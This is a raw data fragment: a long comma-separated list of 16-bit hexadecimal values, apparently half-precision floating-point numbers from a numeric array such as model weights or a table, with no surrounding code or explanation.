0xb43e, 0x3733, 0xb604, 0x356c, 0x3647, 0xb055, 0x2e8b, 0x2daa, 0x358a, 0xb241, 0x33c6, 0xb451, 0xb83e, 0x361d, 0xb09c, 0xa6b2, 0x2fc0, 0x3861, 0x3048, 0x2ff5, 0x2c0d, 0x38cb, 0x31ce, 0xb404, 0x3566, 0xb8aa, 0xa663, 0x3655, 0xaffb, 0x2a19, 0xaed8, 0xb593, 0xb475, 0xa702, 0xb1e8, 0xb76c, 0xafd0, 0x34dc, 0x2fb0, 0xb0bb, 0x3422, 0xa5bf, 0xb11d, 0xb64c, 0xb20a, 0xb371, 0x2d83, 0x26b6, 0x3564, 0x2f14, 0xb846, 0xb329, 0x2ce7, 0x3971, 0x3453, 0x3465, 0xb39a, 0x35ee, 0xb5cf, 0x3089, 0x33de, 0x2db5, 0x2d13, 0xb471, 0xaa05, 0x32fe, 0x3786, 0x299c, 0x268e, 0x299a, 0x306a, 0x380e, 0x2b06, 0x2e2c, 0x2e77, 0x2fbb, 0x2554, 0x25b7, 0x3534, 0x350c, 0x34e3, 0xb631, 0x111f, 0xa71f, 0xb00d, 0xb3d2, 0x3275, 0x3333, 0x323a, 0xb511, 0xac8f, 0xa481, 0xb48e, 0x313b, 0xb477, 0x353c, 0x33b7, 0x33af, 0x2c8b, 0xb545, 0xb6f2, 0x3740, 0x32b1, 0x2ac0, 0x34e9, 0x2e46, 0xb081, 0xb8a1, 0xb585, 0xb7f5, 0x3141, 0xb6c1, 0xad0e, 0x316c, 0xa449, 0x32a3, 0xb581, 0x28ec, 0xb471, 0xb8b5, 0xb610, 0x3016, 0x29d2, 0xb746, 0xa86f, 0x3752, 0x3220, 0xa89b, 0x2288, 0xb65d, 0x373a, 0xb25d, 0xae91, 0x38bf, 0x2b46, 0x3202, 0xb412, 0x330f, 0x37b4, 0x3303, 0x31c2, 0x2c23, 0xb365, 0xb1e9, 0xb59f, 0xb824, 0xb297, 0xb169, 0xa9ec, 0x31f1, 0xb188, 0xb8e5, 0x2a59, 0xb4d0, 0xa824, 0xb11b, 0x2d8a, 0xb52d, 0x307f, 0x2d7f, 0x2cd6, 0x3365, 0x35db, 0xad36, 0xb646, 0x331d, 0x33d4, 0x2f2e, 0xb511, 0x2e72, 0x2cd2, 0x354f, 0xb081, 0x31f0, 0xa07e, 0x30c9, 0xb23e, 0x29f3, 0xb23b, 0xb48b, 0xb030, 0x301a, 0xad51, 0x33bd, 0xb013, 0x363d, 0x9ff7, 0x30eb, 0x94af, 0x241f, 0xb5e1, 0xb485, 0xb639, 0xb35c, 0xad38, 0x1e21, 0x323b, 0xb732, 0x2888, 0x34d3, 0x341a, 0xb827, 0x338d, 0xa824, 0x390e, 0xb1e1, 0x25ae, 0x3517, 0x36e4, 0xa6c5, 0x2e2b, 0x3451, 0xa93e, 0xb525, 0x2d4a, 0xad50, 0xb43d, 0xb379, 0x3378, 0xb079, 0xb226, 0x9ced, 0xb09e, 0xb84a, 0xb30d, 0x3838, 0xb42a, 0xb793, 0x3200, 0x98c1, 0x346d, 0x34fb, 0xacfe, 0x2c50, 0xb07a, 0x3157, 0x2284, 0x2d02, 0x2ceb, 0x2886, 0xb7cb, 0x34e1, 0xa780, 0x27f8, 0x2b97, 0x301e, 0xaeff, 0x3449, 0x2eb6, 0x2c0f, 0xa246, 0x3466, 0xb363, 0x38a8, 0xb6fd, 0xae24, 0x3870, 0xb809, 0xb85b, 0xaa52, 0x3790, 0xac19, 0x343f, 0x2cae, 0x3855, 0xb00d, 0x3443, 0xb1d4, 0x3233, 0x3172, 0x36e4, 0x303b, 0x32e7, 0x3544, 0x2d07, 0x3353, 0x3445, 0xb467, 0xb530, 0x349b, 0xb48b, 0x35dc, 0xb55f, 0xa9ab, 0x3657, 0x2c9d, 0xb33d, 0x380c, 0x2912, 0x3482, 0xa9fc, 0x26ac, 0xb68e, 0xb47e, 0x31f9, 0x31a6, 0xb585, 0x33af, 0x3242, 0x32db, 0xa9d1, 0x3874, 0xad74, 0xb357, 0x29fe, 0xb0a1, 0x30b8, 0xaecf, 0x332f, 0x3139, 0x34cb, 0x33b5, 0x3038, 0xae83, 0x276a, 0x322e, 0xb40c, 0xb4d2, 0x2445, 0x3668, 0x34e1, 0x35e3, 0xb280, 0xa8fb, 0xb766, 0xaf6d, 0xaa1d, 0xb831, 0x2595, 0x3592, 0x1cdc, 0x2a26, 0xa8a8, 0xb1fc, 0xb189, 0xb06a, 0xb7b9, 0xa69d, 0xb1f9, 0x2fdf, 0xac15, 0xb4d6, 0xb374, 0xb158, 0x2cf1, 0x3590, 0x380c, 0x344a, 0x3107, 0xa860, 0x36e0, 0xb17f, 0xb776, 0x1015, 0x364c, 0xb245, 0x365a, 0xad3d, 0x32e6, 0x3802, 0x320d, 0x2dfa, 0x323e, 0xa9f1, 0x2d56, 0x2963, 0xae86, 0xadd5, 0x39e0, 0xb521, 0x36b3, 0x3123, 0xada6, 0xb651, 0xaff5, 0xb600, 0x9f69, 0xb48e, 0xadad, 0xaf03, 0xb654, 0xaff3, 0x3135, 0xa9cd, 0x2008, 0x2d5f, 0xb5d9, 0x32b2, 0x376a, 0x368d, 0x24ce, 0xa726, 0x2e46, 0x319b, 0xaccb, 0xa92c, 0xa1fe, 0x2ea7, 0xb3b9, 0x32b0, 0x36d0, 0xb2b6, 0x3494, 0xb0e3, 0xaf7a, 0xb509, 0xadd0, 0xb2ca, 0xa6e4, 0xa706, 0xb3f8, 0xb466, 0xafd6, 0xa345, 0x9ffe, 0x3513, 0xba62, 0xb51c, 0x3283, 0xab7f, 0x2e83, 0xb689, 0xb458, 0x2833, 0x34dd, 0xb72f, 0xaf40, 0x28a2, 0x2d7d, 0x2f55, 0xb5f0, 0xabc3, 0x2503, 0xb343, 0x2c89, 0x1caf, 0x2c99, 0xb6d9, 0xb683, 0x2100, 0x3733, 0xb55b, 0x9b4e, 0xad6e, 0xa865, 0x31c1, 0xb01c, 0x2e11, 0x24a6, 0x313e, 0xb281, 0x244a, 0xadd2, 0x2d86, 0xb17b, 0x2c37, 0xa654, 0x30ac, 0xb881, 0x35b7, 0xb71f, 0xaf29, 0x289c, 0x2fbe, 0x3571, 0xb54f, 0x34b3, 0xb368, 0x2df9, 0xb53a, 0xb86d, 0x293a, 0x32dc, 0xb43f, 0xa29f, 0xb399, 0xb42d, 0xadb1, 0x2db8, 0xb26b, 0xa87a, 0xaccc, 0xa528, 0xb4b8, 0x324b, 0x3482, 0xaf7c, 0xb499, 0x31ac, 0xa3e8, 0x2882, 0xb1cd, 0x32ba, 0x27e8, 0xa922, 0xb56e, 0x2fd1, 0xab81, 0xb14c, 0xa400, 0xae99, 0xb1c3, 0xb5cb, 0xad2d, 0x3541, 0x3138, 0x2f0b, 0x3314, 0xac14, 0xb4df, 0x2707, 0x323e, 0xaa98, 0xac59, 0xac65, 0xacf7, 0xa422, 0x3250, 0xaf43, 0xb1e4, 0x30f5, 0x348a, 0x302b, 0x3162, 0x3563, 0x3443, 0xb109, 0x3562, 0x2e33, 0xad35, 0x3436, 0xaca2, 0x31ca, 0x3671, 0xb378, 0xb434, 0xabb0, 0xb9fd, 0x116d, 0xacf8, 0xb5e6, 0xb1ef, 0xb522, 0x339c, 0xb71d, 0xb190, 0xb597, 0x281f, 0xb76d, 0x30ab, 0xa6a4, 0xb368, 0x8af8, 0x31f0, 0x37f7, 0xb4fc, 0x2cd6, 0x37ac, 0x2d27, 0x2ff8, 0x3339, 0x3331, 0xb4f0, 0xa013, 0x3450, 0xbb7f, 0x3841, 0xb5d9, 0x3299, 0xae0d, 0x24be, 0xb8d3, 0x2ec6, 0xb01d, 0x353f, 0x2cfe, 0x344e, 0xad36, 0x34d8, 0x362b, 0xad46, 0xa92d, 0xb6fe, 0xacb4, 0xb309, 0xb2b0, 0xb4d0, 0x2ae6, 0x3183, 0xa541, 0xa45a, 0x3463, 0x34bd, 0xb2a0, 0xb47b, 0x3462, 0x3163, 0xa6dd, 0x3852, 0x33df, 0xb0f8, 0xa5b0, 0xb1df, 0xb47c, 0xb35e, 0xb37c, 0x3876, 0x3509, 0x30e2, 0xb045, 0xaa0c, 0xae1a, 0xa616, 0x33d3, 0x17f3, 0x35ca, 0x1c37, 0x2a80, 0xba0d, 0x96b1, 0x327b, 0xabf4, 0x2e7a, 0xb4a6, 0xb4d7, 0x2a9c, 0x32a2, 0x34ba, 0xb65d, 0x362e, 0xb2e4, 0x2d1a, 0x2291, 0xb2b8, 0x2e71, 0xa19a, 0xb491, 0x2f23, 0x3175, 0x29a7, 0xb5e1, 0x3568, 0xac14, 0x2eaa, 0xb316, 0x2c67, 0xb337, 0xb411, 0x2fd6, 0x25b5, 0xac3a, 0xb1d8, 0x308f, 0x3311, 0xa7f3, 0x305c, 0xae43, 0xb21f, 0xacc1, 0x348b, 0xb6cd, 0xa57d, 0x396f, 0xb1dd, 0xac89, 0x2a47, 0x2afb, 0xb323, 0xb068, 0xb823, 0xb038, 0xb8e0, 0xb245, 0xac5a, 0xb68e, 0x3492, 0xb7df, 0x352b, 0xb7c6, 0x3301, 0xae09, 0xb110, 0x310d, 0x2c87, 0x317f, 0x25f1, 0x2959, 0xb398, 0xacbb, 0xab04, 0x2d01, 0x3668, 0x2ba6, 0x3730, 0xb34a, 0xb3f8, 0xb26b, 0xa45f, 0x3118, 0x3479, 0x3706, 0x34e2, 0xae62, 0x2cec, 0xa914, 0xba6d, 0x2e52, 0x3501, 0x3519, 0xb169, 0x3148, 0xac45, 0xb826, 0x3160, 0xb4cf, 0x34d9, 0x2bc8, 0x310b, 0xadc2, 0x3315, 0xb4c2, 0x2eb1, 0x3759, 0x30ca, 0xb3bd, 0xb439, 0x35ab, 0x3033, 0x3376, 0x348a, 0x315e, 0x34d2, 0x3343, 0xa618, 0x2ae7, 0x312c, 0x2d86, 0xaee6, 0xb053, 0x9a34, 0xb4a3, 0xb6e6, 0xb497, 0x3320, 0xac54, 0xa99d, 0x2911, 0x3701, 0xb97b, 0x26fb, 0x2ea9, 0x347c, 0x3446, 0xaea8, 0xafe8, 0xb35c, 0xa274, 0xb21a, 0xaddb, 0xb1a4, 0xb5ab, 0xb05a, 0xb26c, 0x25d4, 0x3580, 0x3159, 0xab7e, 0x341d, 0x323c, 0xb38a, 0x22ce, 0xb2e2, 0xa93c, 0xb200, 0x344a, 0x3067, 0x36ca, 0xa9a4, 0xb527, 0x34b8, 0x352d, 0x3673, 0x31c7, 0xb1d6, 0x2c11, 0xa782, 0x38da, 0xa580, 0x315b, 0x31a5, 0xaf7c, 0x3323, 0xb684, 0x2eec, 0x3054, 0x334a, 0xb54a, 0xad1f, 0x3054, 0x3843, 0xb513, 0x3465, 0x24e8, 0xb5bf, 0xb3da, 0x2de9, 0xb38e, 0xb4bf, 0x3458, 0x3237, 0x34a8, 0xb189, 0xae94, 0x2e20, 0x2e47, 0xb088, 0xac93, 0x304a, 0x9873, 0x355d, 0xb6a3, 0xb651, 0xb2d2, 0x3554, 0xb0a8, 0x221a, 0xac95, 0x9ba9, 0x3702, 0x3330, 0xace4, 0xb538, 0x270c, 0xb63c, 0xb2df, 0xb5a3, 0x3565, 0xa0cc, 0x340b, 0x30a3, 0x31fd, 0xb0e0, 0xb895, 0xafc8, 0xaf5b, 0x2c1d, 0x23a3, 0x2205, 0x290d, 0x2306, 0x3217, 0x3469, 0x30b7, 0xb20f, 0x2ea6, 0xad05, 0x321e, 0x310a, 0x3639, 0x3282, 0xb446, 0xb3c4, 0x281b, 0xb273, 0x3154, 0xad81, 0x29f3, 0xb4c7, 0x2d3c, 0x3161, 0x30f7, 0x3177, 0x36b6, 0x38ed, 0xac29, 0xb6fb, 0xb15e, 0x2f0e, 0x2bad, 0x2a70, 0xaf22, 0x3132, 0x34b1, 0x317a, 0x2fe6, 0xb22b, 0xb589, 0x3725, 0x30d6, 0xb196, 0x318c, 0x2eed, 0xae46, 0xb575, 0x316e, 0xb42e, 0x2429, 0xaae2, 0xb788, 0x324c, 0xb666, 0x1c89, 0xb50d, 0x2f7a, 0x2d12, 0xa744, 0x2847, 0xacf3, 0xb177, 0xb048, 0x326f, 0xad58, 0x2676, 0xa83d, 0x2d93, 0xa739, 0xaa3a, 0xa7fb, 0x3639, 0xb199, 0x3000, 0xb6b1, 0xb2fe, 0xab1f, 0x341d, 0xb01d, 0xb5ec, 0xbaba, 0x31f1, 0xb273, 0x2f49, 0xaca1, 0x318d, 0xa1b6, 0x36f1, 0xb56e, 0x36dd, 0xb59b, 0xb7ca, 0xb586, 0xb55f, 0x309b, 0xb6c7, 0x328c, 0xba1d, 0x313d, 0xb42a, 0xb4dc, 0xa253, 0x36ab, 0x2d9f, 0x32ca, 0xa8bb, 0x2143, 0x379e, 0xaa2a, 0xac06, 0xb0ba, 0xaa76, 0xaf6a, 0xa8a6, 0xb240, 0xb685, 0xb4f9, 0x2e09, 0xad77, 0xb0ad, 0x3574, 0xacc5, 0xb7de, 0x9d16, 0x1ec9, 0x2bd8, 0xaee5, 0xb88b, 0xb0a4, 0x38a4, 0xb496, 0xaec8, 0x30df, 0xb356, 0xa260, 0x2d95, 0x3209, 0x32aa, 0xb28e, 0xaab4, 0x3056, 0x2761, 0x3065, 0xaa0d, 0x20bb, 0x346a, 0xb346, 0x1ff2, 0xb2ce, 0xb458, 0xb596, 0xb1f8, 0x370e, 0x2f84, 0x3800, 0xb0ae, 0x2cb9, 0xb0a6, 0xb0cf, 0xb745, 0xb377, 0xa3bb, 0xa5ba, 0x2c76, 0x302f, 0x2d5b, 0x35f9, 0x2a8b, 0x34a5, 0x3089, 0x2d01, 0xb6ed, 0x2b97, 0x37e8, 0xb1de, 0x3269, 0x349e, 0x331a, 0x3439, 0x33e9, 0x2e78, 0x30c5, 0x29a5, 0xa8c1, 0xb49e, 0xb22c, 0x2e08, 0x3498, 0xb7ac, 0x283b, 0x2e61, 0xac3d, 0xac76, 0x305d, 0x1a96, 0x32f2, 0x2cc6, 0x2983, 0x2118, 0xb477, 0x316f, 0x977c, 0x2e93, 0x37ad, 0x2333, 0xb133, 0x34da, 0x32b5, 0xb0ee, 0x34ce, 0x30a4, 0xae95, 0xb20c, 0xb3ff, 0x359f, 0xaf56, 0xb1c2, 0x3569, 0xb5da, 0xb404, 0x379d, 0xaf33, 0x2ef3, 0x37d5, 0xb5bc, 0x32a1, 0x36f7, 0x3749, 0xb36f, 0x36da, 0x30bc, 0xb686, 0x3391, 0xb866, 0x324b, 0x2eb9, 0x2df9, 0x3183, 0xac81, 0xaa9d, 0xb809, 0x3805, 0x2ade, 0x358c, 0x2da9, 0xb87e, 0xb4d6, 0x3217, 0xa5cc, 0x3560, 0x28da, 0xb625, 0xb229, 0xaa6a, 0xb868, 0x3323, 0x2c48, 0x30b7, 0xb1ee, 0x2ffe, 0xb480, 0x31a6, 0xb818, 0x3685, 0x1497, 0x360a, 0xb619, 0x3905, 0xad69, 0xb46f, 0xaa82, 0x31a5, 0x3028, 0xaa1c, 0xba89, 0xb555, 0xadd0, 0xb10f, 0x2c25, 0x9ef7, 0x3441, 0x2ef5, 0xaeeb, 0x3422, 0xa4d8, 0x3282, 0x201d, 0xb312, 0xb4d0, 0x2d6d, 0x336e, 0xb5ec, 0xb513, 0x35f0, 0x35c1, 0x352e, 0xb5e7, 0xb45b, 0x1fc8, 0x33bd, 0xb825, 0xac2d, 0xb1c8, 0xb48a, 0xaf8d, 0xb74f, 0xa8e6, 0xa4e1, 0x342f, 0xb3f3, 0xa218, 0xb966, 0x380e, 0x1bfb, 0x364c, 0xb067, 0xb28a, 0xaa3a, 0xb7fb, 0x3810, 0x233a, 0xb57a, 0x2e95, 0x2da9, 0xb4ea, 0xb4b3, 0xad3c, 0xaa9e, 0x3145, 0xad20, 0xb7c4, 0xb13f, 0x2e7c, 0xb119, 0xb195, 0xaa2a, 0x2f93, 0xaa2d, 0x357c, 0xaf71, 0x30ab, 0xb453, 0xb2c5, 0x3042, 0x381a, 0x30cb, 0xb7f2, 0xaaef, 0x31c9, 0xb277, 0x35bd, 0x331c, 0x303d, 0xa8cb, 0xa55f, 0xb765, 0x36e0, 0x280a, 0xb339, 0x3635, 0xae62, 0xb59c, 0x371a, 0x364b, 0xacc9, 0x32a9, 0xaf1e, 0x34dd, 0x2d26, 0x33f6, 0xac1f, 0x33c8, 0x34bc, 0xa455, 0xb606, 0x2a29, 0xa63e, 0xabee, 0x321e, 0x332e, 0xa9d7, 0xa42f, 0xb50a, 0xb014, 0xb6b0, 0x326f, 0xb245, 0x3941, 0xb5a3, 0x2dec, 0x302b, 0xb43d, 0xb6aa, 0x338a, 0x2f99, 0x38a6, 0xaffc, 0xb0f4, 0xb809, 0x3498, 0x3949, 0xb72e, 0xad3e, 0x2682, 0x2449, 0xa3d3, 0x2753, 0x3636, 0xb53d, 0x3317, 0x340e, 0xb1e7, 0xafd5, 0x230b, 0xa83c, 0xb3d9, 0xb994, 0xb237, 0x322f, 0x3080, 0xb1ea, 0xa588, 0xb0f8, 0x385b, 0xac23, 0xaa4b, 0x238e, 0xb669, 0x102e, 0xb0ca, 0x3026, 0xad4d, 0xb011, 0xb6cc, 0x2f25, 0xb6bb, 0xb224, 0x340d, 0xabd9, 0xb1c2, 0xa7cc, 0x268a, 0x3580, 0xb157, 0x1f73, 0x3697, 0x226, 0xa9bb, 0x2e5c, 0x301c, 0x31e4, 0xb547, 0x2d64, 0xb74d, 0x3717, 0xae72, 0x37ca, 0xb07f, 0xb1f4, 0x313a, 0x2c9e, 0x1f4a, 0x323d, 0x3236, 0xb01d, 0xb465, 0xb5c7, 0x3147, 0x3410, 0xa6f8, 0x9900, 0xaf6a, 0x37a5, 0x312a, 0xb6a6, 0xad44, 0xb449, 0xae29, 0xa626, 0x3110, 0x387a, 0x907c, 0xb0c5, 0xb5bf, 0xaf7c, 0xb419, 0x30ac, 0xb4a9, 0xb3d5, 0xb123, 0x2cf3, 0xaf01, 0x314d, 0x24b6, 0xb39c, 0xb3d7, 0xb595, 0x353a, 0xa43b, 0x31ef, 0xae6e, 0x3349, 0x32e1, 0x3404, 0xa0da, 0x35fe, 0x2cfc, 0xb401, 0x9d84, 0x352d, 0x2f4e, 0x25ea, 0x300c, 0x3794, 0x2f87, 0xb48b, 0xb09f, 0xb5ee, 0xb471, 0x2c18, 0x31c4, 0xb4d5, 0xb1c8, 0x3416, 0xb7a8, 0xb1e1, 0xae89, 0x2e24, 0x313a, 0xb357, 0xaf31, 0xb2a9, 0xb5fd, 0xb1d5, 0xb549, 0x2dd7, 0x2d3a, 0xb316, 0x3190, 0x3694, 0x32cc, 0x232e, 0xafe2, 0xab4c, 0xa726, 0xb789, 0x33b4, 0x351f, 0x392a, 0xb48c, 0xa9a9, 0x37c8, 0xb697, 0x301d, 0x34ad, 0x36d3, 0xacee, 0xa733, 0xb034, 0xb0fc, 0x3652, 0x32ac, 0xb527, 0x20d7, 0xb451, 0x34ae, 0xb0b9, 0x3236, 0xb1ad, 0x281a, 0x2f69, 0x3776, 0xb5a7, 0x3618, 0x2482, 0x3485, 0x2cd8, 0xaa40, 0x2d70, 0xad5f, 0xa42c, 0xb24c, 0xb109, 0xacc2, 0x1c30, 0xb706, 0x2f44, 0xa833, 0xaf98, 0xaf49, 0x2762, 0xa924, 0x2f5b, 0xb9bf, 0x2e8f, 0x3060, 0xb823, 0xb497, 0x26fb, 0x380c, 0xb11f, 0xa964, 0x9c50, 0xb356, 0x326b, 0xb50e, 0x318d, 0x2207, 0x2d7a, 0xb45a, 0x355c, 0xb302, 0xb6ad, 0xb45b, 0xb215, 0xb55d, 0x325e, 0x2b6d, 0xb11f, 0xaa98, 0x37e0, 0xb411, 0x207a, 0x3624, 0xb18a, 0x2eb0, 0xb5a0, 0xb304, 0xb54c, 0xb0b2, 0x36a0, 0x32df, 0xb0d7, 0x2bd9, 0xae46, 0x3546, 0x3053, 0x1276, 0xad23, 0x2f9f, 0xb5fc, 0xacc5, 0x300f, 0x294a, 0x362d, 0x29a3, 0xb4e8, 0xb75f, 0xb6b5, 0xb808, 0x307c, 0xb6b4, 0xb10e, 0xb490, 0x380a, 0xaf17, 0x98d9, 0xacff, 0x1a33, 0x3030, 0xb01c, 0x349f, 0xb374, 0xb47e, 0x346f, 0x2fb8, 0xb05f, 0xb416, 0xa753, 0x30f0, 0xaa77, 0x285d, 0x314e, 0xada2, 0x3636, 0x3349, 0x28c3, 0xa0c6, 0xa8ca, 0xb73f, 0x2491, 0x33bc, 0xafd9, 0xb297, 0xb563, 0xaea2, 0x3530, 0x9efc, 0x2f28, 0xa611, 0xa027, 0x30ff, 0xb18a, 0x2a0d, 0x9b43, 0x3a22, 0xb172, 0x3150, 0x3686, 0x3581, 0xb232, 0x1c57, 0xa95d, 0x3501, 0xb52a, 0x2bbc, 0xb49a, 0xba2d, 0xad7b, 0xb51f, 0x241a, 0xb758, 0xb7a4, 0xb7c9, 0x2f23, 0xaa3f, 0x357f, 0xac55, 0xaf43, 0x3369, 0xa911, 0xad51, 0x20ab, 0xb0a6, 0xb0c6, 0xa8ea, 0x32cc, 0x35e9, 0x2c9e, 0xb50f, 0x367a, 0x315c, 0xb2ae, 0x3525, 0x2cdd, 0xabb1, 0xb7f4, 0xba8e, 0x2ec8, 0x31c0, 0xa60b, 0xb5d0, 0x36a8, 0x3127, 0xb598, 0xa1fc, 0x3695, 0xb60f, 0xaedd, 0xb139, 0xb051, 0xb22d, 0xa6b9, 0xb080, 0x359f, 0x2d7a, 0xa4c7, 0xb2c3, 0x3401, 0x2691, 0x2aab, 0x2a82, 0x2ddb, 0xb31e, 0x2cc6, 0x2ec5, 0xb205, 0xb85a, 0x33a0, 0xac46, 0x3641, 0x26dc, 0x3544, 0xb53f, 0x2ece, 0x2cd2, 0xad18, 0xb770, 0x284a, 0x2c65, 0xad05, 0x35d6, 0xb0bb, 0xb319, 0x3018, 0x3560, 0xb529, 0x2de4, 0x324e, 0x2e4b, 0x2a7d, 0xab53, 0x3253, 0x3815, 0xb8f2, 0xb798, 0x2fbc, 0xb0fe, 0x3238, 0xaa29, 0x3458, 0x3601, 0xb677, 0x2856, 0x2f37, 0x257f, 0xb953, 0x29f3, 0x3565, 0xb8d8, 0x2ca0, 0x351f, 0xaefe, 0x3513, 0xb860, 0x32c9, 0xb2c7, 0xa8a4, 0x3189, 0x3361, 0xb23a, 0xac19, 0x36b3, 0x3199, 0x393c, 0xb625, 0x32c0, 0xb361, 0xae0e, 0xa473, 0x36bd, 0x34e8, 0xac8f, 0x277a, 0xb418, 0xb4e0, 0x338e, 0x326a, 0x2df2, 0x2cb3, 0x312f, 0xaf2b, 0x3372, 0x34ac, 0x3906, 0xab94, 0xb42c, 0xa69c, 0xb0ee, 0xb180, 0xafb3, 0x2a64, 0xb5e6, 0x35ac, 0x361c, 0xb837, 0x36df, 0xb84f, 0xb62c, 0x3583, 0xb7cf, 0xa9fa, 0xb5c3, 0x2df7, 0xb8a4, 0x3427, 0xb517, 0x2e38, 0xa533, 0xb172, 0x2ed3, 0x2948, 0x351b, 0xb1b5, 0x19e6, 0x31a1, 0x344e, 0xa8a9, 0x2d9e, 0x35be, 0x3359, 0x2dff, 0xb35f, 0x35b4, 0x33b4, 0xae9b, 0xa8b2, 0xb767, 0xb293, 0xb748, 0x2eb4, 0x3046, 0xa3d0, 0x3213, 0xb656, 0x2fcd, 0x2c69, 0x33b3, 0x357b, 0x3424, 0xaf29, 0xb3e3, 0x2df8, 0xb33c, 0xb69f, 0xae72, 0xb1bb, 0xb3f0, 0x2f3e, 0x3251, 0x2ce8, 0x2c9d, 0x9eb3, 0xb07c, 0x3343, 0xa804, 0xb582, 0x28e8, 0xb55c, 0xb42d, 0xb430, 0x34ba, 0x2d06, 0x27cc, 0xb5da, 0xb2b4, 0x38ab, 0x3757, 0xb571, 0xb311, 0xb042, 0xacc7, 0x3502, 0xa803, 0x28df, 0x2a18, 0x350a, 0x3506, 0x2ca5, 0x2d74, 0x1f0d, 0x34e6, 0xaf9b, 0x355d, 0x398d, 0x382e, 0xaf3e, 0x36e3, 0xaf19, 0x2a92, 0x313e, 0xae87, 0x34b9, 0x2a7e, 0xb4d9, 0xad3d, 0xab8e, 0xb019, 0xb22f, 0xb3e0, 0x34c6, 0x2e40, 0xadf5, 0x25cc, 0xb2a9, 0x3403, 0x2b1d, 0xad16, 0x26b5, 0x25aa, 0x2f0b, 0xa539, 0x32c0, 0x3046, 0xafe3, 0x31d2, 0x338c, 0xb5f8, 0x2d01, 0x37b0, 0xb551, 0x3075, 0xb715, 0x399b, 0x31c4, 0xb519, 0xacd9, 0xa860, 0xb620, 0x30fb, 0xb030, 0x34dd, 0x3032, 0xb1d6, 0xb23e, 0x984b, 0x3281, 0xafb4, 0x34cf, 0xb498, 0xb681, 0xb14f, 0x224d, 0xb23a, 0x301a, 0xb4f3, 0xb3db, 0x3406, 0xb269, 0x3250, 0xb000, 0x3860, 0x2863, 0x2864, 0xb001, 0x3639, 0x3434, 0xb5e2, 0x2925, 0x2fa4, 0x327d, 0xaf64, 0x3218, 0x3416, 0x242a, 0x2fb4, 0x2868, 0xa4c7, 0x2a43, 0x2a8f, 0x2d3c, 0x3207, 0xaf6d, 0xb4d5, 0xa83f, 0xb97e, 0x30ee, 0x3043, 0x3915, 0xb121, 0x2c5e, 0xb74c, 0xb204, 0xb4b9, 0xb0b0, 0x31f6, 0xad4d, 0x2e34, 0x3247, 0xafef, 0x32fe, 0x248d, 0x31fc, 0x2f7c, 0xac14, 0xb15a, 0xaef3, 0x3727, 0xb4a3, 0x36d8, 0xaf3b, 0xa779, 0x2820, 0x2865, 0xb72a, 0xb245, 0x2c3b, 0xb20e, 0xb86f, 0x3409, 0xacb4, 0x36b3, 0x9e8e, 0xb4c0, 0x33c3, 0xb408, 0xaafc, 0xb761, 0x337f, 0xb29b, 0xb4f9, 0xab56, 0xb6e9, 0x32ae, 0x36ec, 0xb7bd, 0x3264, 0xb12f, 0x21cc, 0x3591, 0xac05, 0xa1e8, 0xb84f, 0x354b, 0xb8d4, 0xb394, 0x2c78, 0x35ae, 0x3852, 0x2daf, 0xabb9, 0xb040, 0xa40d, 0x34f5, 0x2f14, 0xb37b, 0x3134, 0xac7f, 0xacbc, 0xb0ea, 0x2efd, 0x3064, 0x3822, 0x2c41, 0x350b, 0xafaf, 0x2cf4, 0x3100, 0x3652, 0xb704, 0xb0fa, 0xa993, 0xb107, 0xb27f, 0x3763, 0x324e, 0x2fbb, 0x302c, 0xb153, 0xb05e, 0xb376, 0x34de, 0x2dcb, 0x334c, 0xa44a, 0x3407, 0x38a9, 0xac52, 0xb46d, 0x342e, 0x35b5, 0xb448, 0x3a72, 0x253e, 0xb01a, 0xafc2, 0x2cb4, 0x2bdf, 0x28d8, 0x33b7, 0xb6a3, 0xa714, 0x9ff6, 0x356a, 0xb3e1, 0x3258, 0x2d28, 0xaf9a, 0xb5a0, 0xa854, 0xaaa1, 0xb3f6, 0xb167, 0xb6c9, 0x3052, 0xb055, 0xb88f, 0x33e6, 0x31d7, 0x30c3, 0x34ba, 0xa37a, 0x3104, 0xb0f3, 0xaa63, 0x225e, 0xa901, 0xb2f2, 0x33c1, 0xaf81, 0xae6a, 0x2481, 0x32f0, 0xa508, 0xb530, 0xb580, 0xa971, 0xaf8d, 0x31cb, 0xb4c7, 0x36e3, 0x1f74, 0xb706, 0xb8b9, 0xb083, 0xafc5, 0xacbe, 0xb17a, 0xb752, 0xb510, 0xb1c1, 0x2a91, 0x24f0, 0xb2b4, 0xb9f1, 0x2d45, 0x3062, 0x32ed, 0xadba, 0x3601, 0x3602, 0xad3c, 0xae90, 0x37de, 0xb2c9, 0xb628, 0xaf02, 0x2c4f, 0x285e, 0x38c2, 0x39a6, 0x338d, 0x30f9, 0x340d, 0xb055, 0xa13d, 0x272f, 0x3210, 0x38f5, 0xa016, 0x3048, 0xb1a3, 0xaea3, 0xb30f, 0xa6c8, 0x3352, 0xb8e7, 0xae6d, 0x2f7f, 0x32d9, 0x2c6e, 0x3044, 0x2b03, 0xad92, 0x3064, 0xa9f3, 0x2bcc, 0x30b8, 0x2f98, 0xb805, 0xb211, 0xa948, 0xa00e, 0xb42d, 0xb4ac, 0x3866, 0x314b, 0xa9c7, 0xb05a, 0xb6a6, 0x354e, 0x305e, 0xa99b, 0xae27, 0x258c, 0x2bff, 0x3169, 0xb6a7, 0xb276, 0x3188, 0x3a04, 0xac00, 0xabc9, 0x3543, 0x32ae, 0xa8e4, 0x34d4, 0x37f0, 0x30af, 0xb161, 0xaefb, 0x2d1f, 0xb3d6, 0xb041, 0xb01b, 0x33ec, 0x308b, 0x27e0, 0xb705, 0xb211, 0xb7e3, 0x3477, 0x3377, 0x318a, 0xb749, 0xb2f6, 0x2e92, 0x24cd, 0x348b, 0xaf25, 0xb533, 0x35e5, 0xbb32, 0xa91d, 0xb48d, 0xa995, 0x1fcf, 0xb5ff, 0x3449, 0x3256, 0x2cb7, 0xab26, 0xae3c, 0xae5c, 0xac75, 0xb1bb, 0x2f13, 0xb468, 0x27c3, 0x273c, 0xb128, 0xacd8, 0x2c28, 0x35f0, 0x3117, 0x202d, 0x2e53, 0xb6a4, 0x2564, 0x3498, 0xa04a, 0x30f8, 0x2eac, 0x353a, 0x3346, 0x313b, 0x30ef, 0x3118, 0x25e0, 0x2cc1, 0x339b, 0x3462, 0xb2a2, 0x317e, 0xb6e5, 0xb273, 0x2d33, 0xb2a2, 0xa6de, 0x323c, 0x2c24, 0x10d7, 0x3973, 0xb644, 0x341d, 0xb07b, 0xacf7, 0xb48c, 0xb300, 0x3572, 0x3444, 0x314a, 0x327a, 0x2c97, 0xb452, 0x37bd, 0x3596, 0x2c95, 0x31db, 0x3686, 0x34bb, 0x3407, 0xb505, 0x30cb, 